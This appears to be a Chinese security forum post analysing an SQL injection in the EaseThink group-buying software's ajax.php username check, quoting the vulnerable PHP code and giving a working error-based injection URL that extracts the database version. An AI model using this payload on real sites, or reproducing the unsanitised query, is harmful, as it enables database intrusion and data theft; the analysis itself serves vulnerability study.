找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2084|回复: 0
打印 上一主题 下一主题

易想团购ajax.php SQL注入分析和Exp

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:48:23 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。9 z# b, C1 A. I/ L6 {
# N6 j9 {& ^4 v. l6 Q/ z: T
* ^" I% S) T" J
: \4 z3 n: y% M9 b; B$ \) D
* 验证会员数据          */         function check_user($field_name,$field_data)         {                 //开始数据验证                 $user_data[$field_name] = $field_data;                 $res = array('status'=>1,'info'=>'','data'=>''); //用于返回的数据                 if(trim($user_data['user_name'])==''&&$field_name=='user_name')                 {                         $field_item['field_name'] = 'user_name';                         $field_item['error']        =        EMPTY_ERROR;                         $res['status'] = 0;                         $res['data'] = $field_item;                         return $res;                 }                 if($field_name=='user_name'&&$GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."user where user_name = '".trim($user_data['user_name'])."' and id <> ".intval($user_data['id']))>0)//这里的$user_data['user_name']的值就是用户名提交过来的值,这里只是过滤了空格。所有存在SQL注入漏洞。                 {                         $field_item['field_name'] = 'user_name';                         $field_item['error']        =        EXIST_ERROR;                         $res['status'] = 0;                         $res['data'] = $field_item;                         return $res;                 }
1 ]7 U" d0 r; t) l7 U0 Z5 s1 x- J: W8 y- d3 O: C

, Z/ @( ?; o; V3 b# Q/ |' U) s- ?* L7 z' r
Exp:7 l2 A' h" j8 {6 V, h
$ f; V) S- b5 r

! F8 w: [5 X+ g+ b7 |+ N$ e  x& g. }4 `! B
http://192.168.9.109/easethink_f ... ame&field_data=**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23 0 J/ I) \5 b" q, R
" L2 @2 m/ c' L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表